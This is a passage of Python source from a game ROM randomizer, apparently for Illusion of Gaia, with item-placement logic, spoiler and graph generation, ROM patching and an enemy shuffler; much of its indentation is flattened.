            if self.item_locations[93][3] in abilities:
                inaccessible_ls += [95]
                self.restrict_edge(223)
                self.restrict_edge(224)
        if self.item_locations[122][3] in abilities:  # Ankor Wat
            inaccessible_ls += [117, 118, 119, 120, 121]
            self.restrict_edge(267)
            self.restrict_edge(268)
            self.restrict_edge(269)
            self.restrict_edge(270)
            self.restrict_edge(271)
            self.restrict_edge(272)
        if self.item_locations[142][3] in abilities:  # Pyramid
            inaccessible_ls += [133,134,136,139,140]
            self.restrict_edge(300)
            self.restrict_edge(301)
            self.restrict_edge(302)
            self.restrict_edge(303)
            self.restrict_edge(304)
            self.restrict_edge(306)
            self.restrict_edge(307)
            self.restrict_edge(313)
        # Change graph node for inaccessible_ls locations
        for x in inaccessible_ls:
            if x in self.graph[self.item_locations[x][0]][11]:
                self.graph[self.item_locations[x][0]][11].remove(x)
            self.item_locations[x][0] = INACCESSIBLE
# Simulate inventory
def get_inventory(self,start_items=[],item_destinations=[],new_nodes=[]):
if not start_items:
start_items = self.items_collected[:]
if not item_destinations:
item_destinations = self.item_destinations[:]
inventory_temp = []
for item in start_items:
if self.item_pool[item][4]:
inventory_temp.append(item)
# negative_inventory = []
# for node in self.graph:
# if self.is_accessible(node) or node in new_nodes:
# negative_inventory += self.graph[node][6]
inventory = []
while inventory_temp:
item = inventory_temp.pop(0)
if item in item_destinations:
item_destinations.remove(item)
else:
inventory.append(item)
return inventory
# Return list of accessible nodes
def list_accessible_nodes(self):
accessible = []
for x in self.graph:
if self.is_accessible(x):
accessible.append(x)
return accessible
def print_accessible_nodes(self):
print("Accessible nodes:")
for x in self.graph:
if self.is_accessible(x):
print("",self.graph[x][5])
def print_inaccessible_nodes(self):
print("Inccessible nodes:")
for x in self.graph:
if not self.is_accessible(x):
print("",self.graph[x][5])
# Takes a random seed and builds out a randomized world
    def randomize(self, seed_adj=0, print_log=False):
        """Build a randomized world from the seed (plus seed_adj).

        Pipeline: seed the RNG, initialize world state, place abilities,
        forward-fill progression items by Monte Carlo until the goal node
        (492) is reachable, fill junk, then do a final full traversal to
        verify completability.  Returns True on success, False if any
        stage fails (caller typically retries with a new seed_adj).
        """
        random.seed(self.seed + seed_adj)
        if self.race_mode:
            for i in range(random.randint(100, 1000)):
                _ = random.randint(0, 10000)
        # NOTE(review): this race-mode RNG burn is duplicated above --
        # looks like copy-paste, but removing one would change every
        # race-mode seed's output, so it is left as-is.
        if self.race_mode:
            for i in range(random.randint(100, 1000)):
                _ = random.randint(0,10000)
        if not self.initialize(print_log):
            if print_log:
                print("ERROR: Could not initialize world")
            return False
        if print_log:
            print("Initialization complete")
        # Initialize and shuffle location list
        item_locations = self.list_item_locations()
        random.shuffle(item_locations)
        # Fill the Mystic Statues and room-clear rewards
        self.fill_statues()
        self.map_rewards()
        # Forward fill progression items with Monte Carlo method
        # Continue to place progression items until goal is reached
        done = False
        goal = False
        cycle = 0
        place_abilities = True
        self.items_collected = self.list_item_pool(1)  # Assume all items for ability placement
        if print_log:
            print("Beginning ability placement...")
        while not done:
            cycle += 1
            if print_log:
                print(" Cycle",cycle)
            if cycle > MAX_CYCLES:
                if print_log:
                    print("ERROR: Max cycles exceeded")
                return False
            self.traverse()
            if place_abilities:
                to_place = self.list_item_pool(2)
                if not to_place:
                    done = True
                else:
                    random.shuffle(to_place)
                    progress = False
                    while not progress and to_place:
                        ability = to_place.pop(0)
                        progress = self.forward_fill([ability],item_locations,False,self.logic_mode == "Chaos",print_log)
                    if progress:
                        self.check_logic()
                    else:
                        if print_log:
                            print("ERROR: Could not place any abilities")
                        return False
                if done:
                    # Abilities done: reset and switch to item placement
                    place_abilities = False
                    done = False
                    if print_log:
                        print(" Finished placing abilities")
                        print("Beginning item placement...")
                    # Randomly place non-progression items
                    self.traverse()
                    non_prog_items = self.list_item_pool(0, [], 2) + self.list_item_pool(0, [], 3)
                    for item in non_prog_items:
                        if item in self.items_collected:
                            self.items_collected.remove(item)
                    self.forward_fill(non_prog_items, item_locations, False, self.logic_mode == "Chaos", print_log)
                    # List and shuffle remaining key items
                    item_list = self.list_item_pool()
                    #random.shuffle(item_list)
                    # Reset graph, prepare for item placement
                    self.reset_progress(True)
                    self.update_graph()
            else:
                if len(self.get_inventory()) > MAX_INVENTORY:
                    goal = False
                    if print_log:
                        print("WARNING: Inventory capacity exceeded")
                else:
                    goal = self.is_accessible(492)
                # Get list of new progression options
                #if print_log:
                #    print("Open edges:",self.open_edges)
                #    print("Open locations:",self.open_locations)
                progression_result = self.progression_list()
                if print_log:
                    print("Progression options: {")
                    print(" ",progression_result[0])
                    print(" ",progression_result[1])
                    print(" ",progression_result[2],"}")
                progression_list = progression_result[0]
                is_progression = (progression_result != [[],[],[]])
                done = goal and (self.logic_mode != "Completable" or not is_progression)
                if not done:
                    if not is_progression:
                        if print_log:
                            print("ERROR: Couldn't progress any further")
                            self.print_graph()
                        return False
                    progress = False
                    # Monte Carlo: pick a weighted-random progression option
                    key = random.uniform(0,100)
                    while not progress and progression_list:
                        progression_mc = self.monte_carlo(progression_list)
                        idx = 0
                        for x in progression_mc:
                            if key <= x[0] and not idx:
                                idx = x[1]
                        items = progression_list.pop(idx)
                        if self.forward_fill(items, item_locations, False, self.logic_mode == "Chaos", print_log):
                            progress = True
                            # if print_log:
                            #    print("  Placed progression items successfully")
                    if not progress:
                        if print_log:
                            print("  No suitable progression found, attempting to make room...")
                        if not self.make_room(progression_result,print_log):
                            if print_log:
                                print("ERROR: Could not find progression")
                                self.print_graph()
                            return False
        if print_log:
            print("Placing junk items...")
        junk_items = self.list_item_pool()
        #random.shuffle(junk_items)
        self.random_fill(junk_items, item_locations, False, print_log)
        if print_log:
            print("Item placement complete, beginning final traversal...")
        self.reset_progress(True)
        self.update_graph()
        self.traverse([],False,print_log)
        if print_log:
            locked_ds = [19,29,122]
            for x in locked_ds:
                if self.item_locations[x][3] in [61, 62, 63, 64, 65, 66]:
                    print("WARNING:",self.item_locations[x][9],"has an ability")
        # Final sanity check: every real node (<600) must be reachable in
        # Completable mode; otherwise only the goal node matters.
        if self.logic_mode == "Completable" and self.goal != "Red Jewel Hunt":
            completed = True
            for node in self.graph:
                if not self.graph[node][0] and node <600:
                    if print_log:
                        print("Can't reach ",self.graph[node][5])
                    completed = False
        else:
            completed = self.graph[492][0]
        if not completed:
            if print_log:
                self.print_graph()
                print("ERROR: Seed failed, trying again...")
                print("")
            return False
        if print_log:
            print("Writing hints...")
        placement_log = self.placement_log[:]
        random.shuffle(placement_log)
        self.in_game_spoilers(placement_log)
        if print_log:
            print("Randomization complete!")
        return True
def print_graph(self):
print("Open edges:",self.open_edges)
print("Open locations:",self.open_locations)
for node in self.graph:
print(node,self.graph[node])
# Prepares dataset to give in-game spoilers
def in_game_spoilers(self, placement_log=[]):
for x in placement_log:
item = x[0]
location = x[1]
if location not in self.free_locations and location in self.location_text:
if item in self.required_items or item in self.good_items or location in self.trolly_locations:
spoiler_str = b"\xd3" + self.location_text[location] + b"\xac\x87\x80\xa3\xcb"
spoiler_str += self.item_text_short[item] + b"\xc0"
# No in-game spoilers in Expert mode
if self.difficulty >= 3:
spoiler_str = b"\xd3\x8d\x88\x82\x84\xac\xa4\xa2\xa9\xac\x83\x8e\x83\x8e\x8d\x86\x8e\x4f\xc0"
self.spoilers.append(spoiler_str)
# print item, location
# Prints item and ability locations
    def generate_spoiler(self, version=""):
        """Build the full spoiler dict into self.spoiler.

        Includes seed settings, Kara's location, item placements, and (when
        relevant) overworld/entrance links.

        NOTE(review): kara_txt and difficulty_txt are only bound for the
        known value ranges (kara 1-5, difficulty 0-3); an out-of-range
        value would raise NameError below -- presumably validated upstream.
        """
        if self.kara == 1:
            kara_txt = "Edward's Castle"
        elif self.kara == 2:
            kara_txt = "Diamond Mine"
        elif self.kara == 3:
            kara_txt = "Angel Dungeon"
        elif self.kara == 4:
            kara_txt = "Mt. Kress"
        elif self.kara == 5:
            kara_txt = "Ankor Wat"
        if self.difficulty == 0:
            difficulty_txt = "Easy"
        elif self.difficulty == 1:
            difficulty_txt = "Normal"
        elif self.difficulty == 2:
            difficulty_txt = "Hard"
        elif self.difficulty == 3:
            difficulty_txt = "Extreme"
        spoiler = dict()
        spoiler["version"] = version
        spoiler["seed"] = str(self.seed)
        spoiler["date"] = str(datetime.utcfromtimestamp(time.time()))
        spoiler["goal"] = str(self.goal)
        spoiler["entrance_shuffle"] = str(self.entrance_shuffle)
        spoiler["start_location"] = self.item_locations[self.start_loc][9].strip()
        spoiler["logic"] = str(self.logic_mode)
        spoiler["difficulty"] = str(difficulty_txt)
        if self.statue_req == StatueReq.PLAYER_CHOICE.value:
            spoiler["statues_required"] = self.statues_required
        else:
            spoiler["statues_required"] = self.statues
        spoiler["boss_order"] = self.boss_order
        spoiler["kara_location"] = kara_txt
        spoiler["jeweler_amounts"] = self.gem
        spoiler["inca_tiles"] = self.incatile
        spoiler["hieroglyph_order"] = self.hieroglyphs
        items = []
        # Locations >= 500 are internal/pseudo locations -- skip them
        for x in self.item_locations:
            if x < 500:
                item = self.item_locations[x][3]
                location_name = self.item_locations[x][9].strip()
                item_name = self.item_pool[item][3]
                items.append({"location": location_name, "name": item_name})
        spoiler["items"] = items
        if "Overworld Shuffle" in self.variant:
            overworld_links = []
            for continent_id, continent_data in self.overworld_menus.items():
                continent_name = continent_data[7]
                region_name = self.overworld_menus[continent_data[0]][8]
                overworld_links.append({"region": region_name, "continent": continent_name})
            spoiler["overworld_entrances"] = overworld_links
        if self.entrance_shuffle != "None":
            exit_links = []
            for exit in self.exits:
                exit_name = self.exits[exit][10]
                linked_exit = self.exits[exit][1]
                if not linked_exit:
                    # Unlinked exits map to themselves in the spoiler
                    exit_linked_name = exit_name
                else:
                    exit_linked_name = self.exits[linked_exit][10]
                exit_links.append({"entrance": exit_name, "exit": exit_linked_name})
            spoiler["exit_links"] = exit_links
        self.spoiler = spoiler
        #self.complete_graph_visualization()
    def complete_graph_visualization(self,print_log=False):
        """Render the world graph into self.graph_viz (a graphviz Digraph).

        Draws one node per graph region, edges for direct connections and
        for logic edges whose item requirements are satisfiable, plus an
        HTML-table node per region listing its item locations.

        NOTE(review): logic entries are indexed here as [0]=origin,
        [1]=dest, [2]=requirements, while other methods in this class use
        [1]/[2]/[4] for the same roles; one of the two layouts is
        presumably stale -- confirm before relying on this output.
        """
        self.graph_viz = graphviz.Digraph(graph_attr=[('concentrate','true'),
                                                      ('rankdir', 'TB')], strict=True)
        graph = self.graph_viz
        areas = dict()
        area_names = ["Overworld",
                      "South Cape",
                      "Edward's Castle",
                      "Itory Village",
                      "Moon Tribe",
                      "Inca Ruins",
                      "Diamond Coast",
                      "Freejia",
                      "Diamond Mine",
                      "Neil's Cottage",
                      "Nazca Plain",
                      "Seaside Palace",
                      "Mu",
                      "Angel Village",
                      "Watermia",
                      "Great Wall",
                      "Euro",
                      "Mt. Kress",
                      "Native's Village",
                      "Ankor Wat",
                      "Dao",
                      "Pyramid",
                      "Babel",
                      "Jeweler's Mansion"]
        graph.attr('node', shape='box')
        for area_id in range(len(area_names)):
            areas[area_id] = list()
        for area_id in range(1,len(area_names)):
            node_name = f"area_{area_id}"
            node_content = area_names[area_id]
            #areas[0].append((node_name, node_content))
        # Bucket each region node by its area id (region_data[3][1])
        for region_id, region_data in self.graph.items():
            area = region_data[3][1]
            node_name = f"region_{region_id}"
            node_content = region_data[5]
            areas[area].append((node_name, node_content))
        for area_id, area_nodes in areas.items():
            for node_id, node_content in area_nodes:
                graph.node(node_id, node_content)
            #with graph.subgraph(name=f"cluster_{area_id}") as c:
            #    c.attr(label=area_names[area_id],
            #           color="black")
            #    for node_id, node_content in area_nodes:
            #        if area_id != 0:
            #            c.node(node_id, node_content)
            #        else:
            #            graph.node(node_id,node_content)
        # Direct graph connections (region_data[1])
        for region_id, region_data in self.graph.items():
            start_area = region_data[3][1]
            node_name = f"region_{region_id}"
            area_name = f"area_{start_area}"
            for accessible_region_id in region_data[1]:
                end_area = self.graph[accessible_region_id][3][1]
                end_area_name = f"area_{end_area}"
                accessible_node_name = f"region_{accessible_region_id}"
                graph.edge(node_name, accessible_node_name)
                #if start_area != 0 and end_area != 0:
                #    if start_area != end_area:
                #        graph.edge(area_name, end_area_name)
                #    else:
                #        graph.edge(node_name, accessible_node_name)
                #elif start_area != 0:
                #    graph.edge(area_name, accessible_node_name)
                #elif end_area != 0:
                #    graph.edge(node_name, end_area_name)
                #else:
                #    graph.edge(node_name, accessible_node_name)
        # Logic edges: only drawn when enough of each required item exists
        # in the pool plus already-filled locations.
        for _, logic_data in self.logic.items():
            needed_items = logic_data[2]
            enough_items = True
            for item_id, quantity in needed_items:
                existing_quantity = 0
                if item_id not in self.item_pool:
                    if print_log:
                        print("Missing info about item:", item_id)
                else:
                    existing_quantity = self.item_pool[item_id][0]
                for _, location_data in self.item_locations.items():
                    if location_data[2] and item_id == location_data[3]:
                        existing_quantity += 1
                if existing_quantity < quantity:
                    enough_items = False
                    break
            if not enough_items:
                continue
            start_name = f"region_{logic_data[0]}"
            dest_name = f"region_{logic_data[1]}"
            start_area = self.graph[logic_data[0]][3][1]
            end_area = self.graph[logic_data[1]][3][1]
            area_name = f"area_{start_area}"
            end_area_name = f"area_{end_area}"
            graph.edge(start_name, dest_name)
            #if start_area != 0 and end_area != 0:
            #    if start_area != end_area:
            #        graph.edge(area_name, end_area_name)
            #    else:
            #        graph.edge(start_name, dest_name)
            #elif start_area != 0:
            #    graph.edge(area_name, dest_name)
            #elif end_area != 0:
            #    graph.edge(start_name, end_area_name)
            #else:
            #    graph.edge(start_name, dest_name)
        per_region_item_node = dict()
        item_location_color_map = {
            1: "yellow",
            2: "blue",
            3: "green",
            4: "white"
        }
        graph.attr('node', shape='plaintext')
        for itemloc_id, itemloc_data in self.item_locations.items():
            # Add Item_location_nodes
            location_region = itemloc_data[0]
            region_node_name = f"region_{location_region}"
            region_item_node_name = f"region_itemnode_{location_region}"
            if (itemloc_data[1] != 2 or itemloc_data[3] != 0) and itemloc_data[1] != 4:
                if region_item_node_name not in per_region_item_node:
                    per_region_item_node[region_item_node_name] = []
                    graph.edge(region_node_name, f"{region_item_node_name}")
                per_region_item_node[region_item_node_name].append((itemloc_id))
        # One HTML table node per region, one row per item location
        for region_item_node_name, locations_id in per_region_item_node.items():
            node_content = "<<table border='0' cellborder='1' cellspacing='0'>"
            for itemloc_id in locations_id:
                itemloc_data = self.item_locations[itemloc_id]
                item_name = self.item_pool[itemloc_data[3]][3]
                location_name = itemloc_data[9]
                if ":" in location_name:
                    location_name = ":".join(location_name.split(':')[1:])
                location_type = itemloc_data[1]
                node_content += f"""<tr>
                <td ALIGN='left' bgcolor='{item_location_color_map[location_type]}'>{location_name.strip()}</td>
                <td align='center'>{item_name}</td>
                </tr>"""
            node_content += "</table>>"
            graph.node(region_item_node_name, node_content)
def print_enemy_locations(self, filepath, offset=0):
f = open(filepath, "r+b")
rom = f.read()
for enemy in self.enemies:
print(self.enemies[enemy][3])
done = False
addr = int("c8200", 16) + offset
while not done:
addr = rom.find(self.enemies[enemy][1], addr + 1)
if addr < 0 or addr > int("ce5e4", 16) + offset:
done = True
else:
f.seek(addr)
# f.write(b"\x55\x87\x8a\x05")
print(" ", addr, hex(addr), binascii.hexlify(f.read(4)))
f.close
# Prints item and ability locations
def print_spoiler(self):
if self.kara == 1:
kara_txt = "Edward's Castle"
elif self.kara == 2:
kara_txt = "Diamond Mine"
elif self.kara == 3:
kara_txt = "Angel Dungeon"
elif self.kara == 4:
kara_txt = "Mt. Kress"
elif self.kara == 5:
kara_txt = "Ankor Wat"
print("")
print("Seed > ", self.seed)
print("Statues Required > ", self.statues)
print("Kara Location > ", kara_txt)
print("Jeweler Reward Amounts > ", self.gem)
print("Inca Tile (column, row) > ", self.incatile)
print("Hieroglyph Order > ", self.hieroglyphs)
print("")
for x in self.item_locations:
item = self.item_locations[x][3]
location_name = self.item_locations[x][9]
item_name = self.item_pool[item][3]
print(location_name, " > ", item_name)
# Modifies game ROM to reflect the current state of the World
    def write_to_rom(self, f, rom_offset=0, print_log=False):
        """Patch the open ROM file `f` to reflect the current World state.

        Writes room-clear rewards, item/ability placements and their text,
        in-game spoilers, enemizer data, the start location, overworld and
        entrance shuffle patches, and flag-initialization switches.

        f: ROM file opened for binary read/write.
        rom_offset: byte offset added to all fixed addresses (e.g. for a
            headered ROM).
        """
        # Room-clearing rewards
        idx_tier2 = 0
        idx_tier3 = 0
        idx_tier4 = 0
        for map in self.maps:
            reward_tier = self.maps[map][2][1]
            if reward_tier > 0:
                reward = self.maps[map][2][0]
                f.seek(int("1aade", 16) + map + rom_offset)
                f.write(binascii.unhexlify(format(reward,"02x")))
                # Populate player level logic
                if reward_tier == 2:
                    f.seek(int("f4a7", 16) + 4*idx_tier2 + rom_offset)
                    f.write(binascii.unhexlify(format(map,"02x"))+b"\x03")
                    idx_tier2 += 1
                elif reward_tier == 3:
                    f.seek(int("f4bf", 16) + 4*idx_tier3 + rom_offset)
                    f.write(binascii.unhexlify(format(map,"02x"))+b"\x03")
                    idx_tier3 += 1
                elif reward_tier == 4:
                    f.seek(int("f4d7", 16) + 4*idx_tier4 + rom_offset)
                    f.write(binascii.unhexlify(format(map,"02x"))+b"\x03")
                    idx_tier4 += 1
        #print("maps done")
        # Items and abilities
        for x in self.item_locations:
            type = self.item_locations[x][1]
            # Write items to ROM
            if type == 1:
                item = self.item_locations[x][3]
                # print "Writing item ", item
                item_addr = self.item_locations[x][5]
                item_code = self.item_pool[item][2]
                text1_addr = self.item_locations[x][6]
                text2_addr = self.item_locations[x][7]
                text3_addr = self.item_locations[x][8]
                if item in self.item_text_long:
                    text_long = self.item_text_long[item]
                else:
                    text_long = ""
                if item in self.item_text_short:
                    text_short = self.item_text_short[item]
                else:
                    text_short = ""
                # Write item code to memory
                if item_code and item_addr:
                    f.seek(int(item_addr, 16) + rom_offset)
                    f.write(item_code)
                # Write item text, if appropriate
                if text1_addr and text_long:
                    f.seek(int(text1_addr, 16) + rom_offset)
                    f.write(text_long)
                    # f.write(b"\xd3")
                    # f.write(text_short)
                    f.write(b"\xc9\x0a\xc0")
                # Write "inventory full" item text, if appropriate
                if text2_addr and text_long:
                    f.seek(int(text2_addr, 16) + rom_offset)
                    # f.write(b"\xd3")
                    # f.write(text_short)
                    f.write(text_long)
                    f.write(b"\xcb\x45\x65\x4b\x4b\x4f\xc9\x0a\xc0")  # Just says "FULL!"
                # Write jeweler inventory text, if apprpriate
                if text3_addr and text_short:
                    f.seek(int(text3_addr, 16) + rom_offset)
                    f.write(text_short)
            # Write abilities to ROM
            elif type == 2:  # Check if filled
                ability = self.item_locations[x][3]
                ability_addr = self.item_locations[x][5]
                map = self.item_locations[x][8]
                # Change Dark Space type in event table
                if ability in [61, 62, 63, 64, 65, 66]:
                    f.seek(int(ability_addr, 16) + rom_offset)
                    f.write(b"\x05")
                # Update ability text table
                if ability == 61:  # Psycho Dash
                    # f.seek(int("8eb5a",16)+2*i+rom_offset)
                    f.seek(int("8eb5a", 16) + rom_offset)
                    f.write(map)
                if ability == 62:  # Psycho Slide
                    f.seek(int("8eb5c", 16) + rom_offset)
                    f.write(map)
                if ability == 63:  # Spin Dash
                    f.seek(int("8eb5e", 16) + rom_offset)
                    f.write(map)
                if ability == 64:  # Dark Friar
                    f.seek(int("8eb60", 16) + rom_offset)
                    f.write(map)
                if ability == 65:  # Aura Barrier
                    f.seek(int("8eb62", 16) + rom_offset)
                    f.write(map)
                if ability == 66:  # Earthquaker
                    f.seek(int("8eb64", 16) + rom_offset)
                    f.write(map)
        #print("items/abilities done")
        # Special code for 2-item event in Dao
        item1 = self.item_locations[125][3]
        item2 = self.item_locations[126][3]
        f.seek(int("8fde0", 16) + rom_offset)
        f.write(b"\xd3" + self.item_text_short[item1] + b"\xcb")
        f.write(self.item_text_short[item2] + b"\xc9\x0a\xcf\xce")
        # Write in-game spoilers
        i = 0
        for addr in self.spoiler_addresses:
            f.seek(int(self.spoiler_addresses[addr], 16) + rom_offset)
            if i < len(self.spoilers):
                f.write(self.spoilers[i])
                i += 1
        #print("spoilers done")
        # Enemizer
        if self.enemizer != "None":
            # "Fix" Ankor Wat Gorgons so they don't fall from the ceiling
            f.seek(int("bb825", 16) + rom_offset)
            f.write(b"\x00\x00\x00\x02\x27\x0F\x02\xC1\x4C\xA0\xB8\x6B")
            # Run enemizer
            self.enemize(f, rom_offset)
            # self.parse_maps(f,rom_offset)
        # Random start location
        if self.start_mode != "South Cape" or self.entrance_shuffle != "None":
            # print self.start_loc
            map_str = self.item_locations[self.start_loc][8] + self.item_locations[self.start_loc][7]
            # Change game start location
            f.seek(int("be517", 16) + rom_offset)
            f.write(map_str)
            # Change Dark Space warp location
            f.seek(int("8dbea", 16) + rom_offset)
            f.write(map_str)
            # Change Dark Space warp text
            map_name = self.location_text[self.start_loc]
            f.seek(int("8de1f", 16) + rom_offset)
            f.write(map_name + b"\x0D\xCB\xAC\x4D\x8E\xCB\xAC\x69\x84\xA3\xCA")
        #print("random start done")
        # Overworld shuffle
        if "Overworld Shuffle" in self.variant:
            ow_patch_data = []
            for entry in self.overworld_menus:
                # Prepare ROM edits
                new_entry = self.overworld_menus[entry][0]
                f.seek(int(self.overworld_menus[new_entry][4], 16) + rom_offset)
                ow_patch_data.append([self.overworld_menus[entry][4], f.read(8)])
                f.seek(int(self.overworld_menus[new_entry][6], 16) + rom_offset)
                ow_patch_data.append([self.overworld_menus[entry][6], f.read(11)])
                ow_patch_data.append([self.overworld_menus[new_entry][5], self.overworld_menus[entry][1]])
            for x in ow_patch_data:
                f.seek(int(x[0], 16) + rom_offset)
                f.write(x[1])
        #print("overworld shuffle done")
        # Entrance shuffle
        er_patch_data = []
        for exit in self.exits:
            #self.exits[exit][0] = exit  #TESTING ONLY
            # Prepare ROM edits
            new_exit = self.exits[exit][1]
            if new_exit and self.exits[exit][5]:  # and exit != new_exit:
                try:
                    if self.exits[new_exit][6]:
                        new_data = self.exits[new_exit][6]
                    else:
                        f.seek(int(self.exits[new_exit][5], 16) + rom_offset)
                        new_data = f.read(8)
                    er_patch_data.append([self.exits[exit][5], new_data])
                except:
                    if print_log:
                        print("ERROR: exit data invalid",exit,new_exit)
        for exit in self.exits_detailed:
            new_exit = self.exits[exit][1]
            if new_exit:
                map_str = self.exits[new_exit][6]
                map_id = map_str[0:1]
                xcoord = int.to_bytes(int.from_bytes(map_str[1:3], byteorder="little") // 16, 2, byteorder='little')
                ycoord = int.to_bytes(int.from_bytes(map_str[3:5], byteorder="little") // 16, 2, byteorder='little')
                facedir = map_str[5:6]
                camera = map_str[6:8]
                # print(map_id,xcoord,ycoord,facedir,camera)
                er_patch_data.append([self.exits_detailed[exit][0], map_id])
                er_patch_data.append([self.exits_detailed[exit][1], xcoord])
                er_patch_data.append([self.exits_detailed[exit][2], ycoord])
                if self.exits_detailed[exit][3] != "":
                    er_patch_data.append([self.exits_detailed[exit][3], facedir])
                er_patch_data.append([self.exits_detailed[exit][4], camera])
        for x in er_patch_data:
            try:
                f.seek(int(x[0], 16) + rom_offset)
                f.write(x[1])
            except:
                if print_log:
                    print("ERROR: Not a valid address", x)
        #print("entrance shuffle done")
        # Check for additional switches that need to be set
        switch_str = []
        if self.start_loc == 19:  # Open Lily's door when starting in Underground Tunnel
            switch_str.append(b"\x02\xcd\x13\x01")
        # elif self.start_loc == 30:  # Inca ramp can hardlock you -- NEW FIX MAKES THIS OBSELETE
        #    switch_str.append(b"\x02\xcd\x0c\x01")
        elif self.start_loc == 47:  # Diamond Mine behind fences
            switch_str.append(b"\x02\xcd\x34\x01\x02\xcd\x35\x01\x02\xcd\x36\x01")
        if "Open Mode" in self.variant:
            switch_str.append(b"\x02\xcc\x11\x02\xcc\x14\x02\xcc\x1f\x02\xcc\x2a\x02\xcc\x41")
        if self.enemizer != "None" and self.enemizer != "Limited":
            switch_str.append(b"\x02\xcc\xa0\x02\xcc\xa1")
        f.seek(int("1ffb0", 16) + rom_offset)
        for x in switch_str:
            f.write(x)
        f.write(b"\x6b")
        #print("switches done")
        # Swapped exits
        # for exit in self.exits:
        #    if self.exits[exit][1] > 0:
        #        to_exit = self.exits[exit][1]
        #        map_str = self.exits[to_exit][9]
        #        if self.exits[exit][8] != "":
        #            f.seek(int(self.exits[exit][8], 16) + rom_offset)
        #            f.write(map_str)
        #        else:
        #            map_id = map_str[0:1]
        #            xcoord = int.to_bytes(int.from_bytes(map_str[1:3], byteorder="little") // 16, 2, byteorder='little')
        #            ycoord = int.to_bytes(int.from_bytes(map_str[3:5], byteorder="little") // 16, 2, byteorder='little')
        #            facedir = map_str[5:6]
        #            camera = map_str[6:8]
        #            # print(map_id,xcoord,ycoord,facedir,camera)
        #
        #            f.seek(int(self.exits_detailed[exit][0], 16) + rom_offset)
        #            f.write(map_id)
        #            f.seek(int(self.exits_detailed[exit][1], 16) + rom_offset)
        #            f.write(xcoord)
        #            f.seek(int(self.exits_detailed[exit][2], 16) + rom_offset)
        #            f.write(ycoord)
        #            if self.exits_detailed[exit][3] != "":
        #                f.seek(int(self.exits_detailed[exit][3], 16) + rom_offset)
        #                f.write(facedir)
        #                f.seek(int(self.exits_detailed[exit][4], 16) + rom_offset)
        #                f.write(camera)
        # print "ROM successfully created"
# Print parsed list of map headers
def parse_maps(self, f, rom_offset=0):
f.seek(int("d8000", 16) + rom_offset)
header_lengths = {
b"\x02": 1,
b"\x03": 7,
b"\x04": 6,
b"\x05": 7,
b"\x06": 4,
b"\x0e": 3,
b"\x10": 6,
b"\x11": 5,
b"\x13": 2,
b"\x14": 1,
b"\x15": 1,
b"\x17": 5
}
done = False
addr = 0
map_dataset = {}
anchor_dataset = {}
while not done:
map_id = f.read(2)
print(binascii.hexlify(map_id))
map_headers = []
anchor_headers = []
map_done = False
anchor = False
while not map_done:
map_header = f.read(1)
if map_header == b"\x14":
anchor = True
anchor_id = f.read(1)
map_header += anchor_id
map_headers.append(map_header)
print(binascii.hexlify(map_header))
elif map_header == b"\x00":
map_done = True
print(binascii.hexlify(map_header))
print("")
else:
header_len = header_lengths[map_header]
map_header += f.read(header_len)
map_headers.append(map_header)
print(binascii.hexlify(map_header))
if anchor:
anchor_headers.append(map_header)
anchor_dataset[map_id] = map_headers
if anchor_headers:
anchor_dataset[anchor_id] = anchor_headers
if f.tell() >= int("daffe", 16) + rom_offset:
done = True
# print map_headers
print(anchor_headers)
# Pick random start location
def random_start(self,print_log=False):
locations = []
for loc in self.item_locations:
if (self.start_mode == "Forced Unsafe" and self.item_locations[loc][6] == "Unsafe") or (
self.start_mode != "Forced Unsafe" and self.item_locations[loc][6] == "Safe") or (
self.item_locations[loc][6] == self.start_mode):
locations.append(loc)
if not locations:
if print_log:
print("ERROR: Something is fishy with start locations")
return -1
else:
# print locations
# return 93 # TESTING!
return locations[random.randint(0, len(locations) - 1)]
# Shuffle travel destinations
def shuffle_overworld(self,print_log=False):
new_continents = [[],[],[],[],[]]
# Ensure each continent has at least one travel location
destination_list = [1,6,12,14,16,18]
random.shuffle(destination_list)
for continent in new_continents:
continent.append(destination_list.pop(0))
# Randomly assign the rest of the locations
destination_list += [2,3,4,5,7,8,9,10,11,13,15,17,19]
random.shuffle(destination_list)
new_continents[0] += destination_list[:4]
new_continents[1] += destination_list[4:8]
new_continents[2] += destination_list[8:10]
new_continents[3] += destination_list[10:13]
new_continents[4] += destination_list[-1:]
for continent in new_continents:
random.shuffle(continent)
self.overworld_menus[1][0] = new_continents[0][0]
self.overworld_menus[2][0] = new_continents[0][1]
self.overworld_menus[3][0] = new_continents[0][2]
self.overworld_menus[4][0] = new_continents[0][3]
self.overworld_menus[5][0] = new_continents[0][4]
self.overworld_menus[6][0] = new_continents[1][0]
self.overworld_menus[7][0] = new_continents[1][1]
self.overworld_menus[8][0] = new_continents[1][2]
self.overworld_menus[9][0] = new_continents[1][3]
self.overworld_menus[10][0] = new_continents[1][4]
self.overworld_menus[11][0] = new_continents[2][0]
self.overworld_menus[12][0] = new_continents[2][1]
self.overworld_menus[13][0] = new_continents[2][2]
self.overworld_menus[14][0] = new_continents[3][0]
self.overworld_menus[15][0] = new_continents[3][1]
self.overworld_menus[16][0] = new_continents[3][2]
self.overworld_menus[17][0] = new_continents[3][3]
self.overworld_menus[18][0] = new_continents[4][0]
self.overworld_menus[19][0] = new_continents[4][1]
self.graph[10][1].clear()
self.graph[11][1].clear()
self.graph[12][1].clear()
self.graph[13][1].clear()
self.graph[14][1].clear()
self.graph[10][10].clear()
self.graph[11][10].clear()
self.graph[12][10].clear()
self.graph[13][10].clear()
self.graph[14][10].clear()
# Add new overworld to the graph
for entry in self.overworld_menus:
new_entry = self.overworld_menus[entry][0]
self.graph[self.overworld_menus[entry][2]][1].append(self.overworld_menus[new_entry][3])
self.graph[self.overworld_menus[new_entry][3]][1].remove(self.overworld_menus[new_entry][2])
self.graph[self.overworld_menus[new_entry][3]][1].append(self.overworld_menus[entry][2])
return True
# Shuffle enemies in ROM
    def enemize(self, f, rom_offset=0):
        """Shuffle enemy placements/spritesets directly in the ROM image.

        For every map, picks a new enemyset (behavior depends on
        self.enemizer: "Limited" keeps each map's original set, "Insane"
        additionally shuffles stat templates, "Balanced" keeps templates),
        then locates each old enemy record inside the map's sprite-data
        address range and overwrites it with a compatible enemy from the
        new set.  Finally disables non-enemy sprites (except in Limited).

        Args:
            f: Open ROM file object (read/write, binary mode).
            rom_offset: Byte offset of the ROM data within the file.
        """
        f.seek(0)
        rom = f.read()
        # test_enemy = 13 # TESTING!
        # test_set = self.enemies[test_enemy][0]
        complex_enemies = [4, 15, 53, 62, 88]  # Enemies with many sprites, or are no fun
        max_complex = 5  # cap of complex enemies placed per map
        # Get list of enemysets
